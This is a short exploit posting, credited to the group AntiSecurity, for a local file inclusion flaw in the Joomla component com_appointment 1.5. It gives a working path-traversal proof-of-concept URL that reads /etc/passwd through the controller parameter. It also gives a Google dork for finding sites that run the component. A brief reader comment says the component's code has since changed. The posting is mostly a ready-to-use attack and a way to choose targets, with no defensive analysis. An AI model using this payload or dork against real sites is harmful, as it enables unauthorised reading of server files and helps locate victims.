Joomla Component Appointment LFI Vuln


[o] Joomla Component Appointment Local File Inclusion Vulnerability
Software : com_appointment version 1.5
Vendor : http://thebestmakers.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/


[o] Exploit
http://localhost/[path]/index.php?option=com_appointment&controller=[LFI]


[o] PoC
http://localhost/index.php?option=com_appointment&controller=../../../../../../../../../../etc/passwd


[o] Dork
inurl:"com_appointment"


One Response so far.

  1. We checked the site and saw that the code has changed for the controller section of the components.